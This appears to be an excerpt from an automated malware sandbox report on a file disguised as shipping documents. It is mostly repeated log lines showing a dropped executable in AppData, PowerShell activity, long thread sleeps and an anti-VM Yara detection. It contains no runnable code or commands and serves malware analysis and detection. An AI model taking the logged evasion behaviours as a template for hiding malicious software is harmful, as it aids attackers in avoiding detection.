Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SNgtfGzYQ.exe PID: 5560, type: MEMORYSTR

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: 4450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: 7590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: 8590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: 8750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Memory allocated: 9750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: 17E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: 3370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: 5370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: 7EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: 8EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: 9040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Memory allocated: A040000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599070	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598592	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598330	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597014	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Window / User API: threadDelayed 2230	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Window / User API: threadDelayed 7621	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6306	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3383	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -599070s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598592s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598482s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -597014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe TID: 7056	Thread sleep time: -594500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe TID: 2820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 599070	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598592	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598330	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 597014	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Thread delayed: delay time: 595812	Jump to behavior
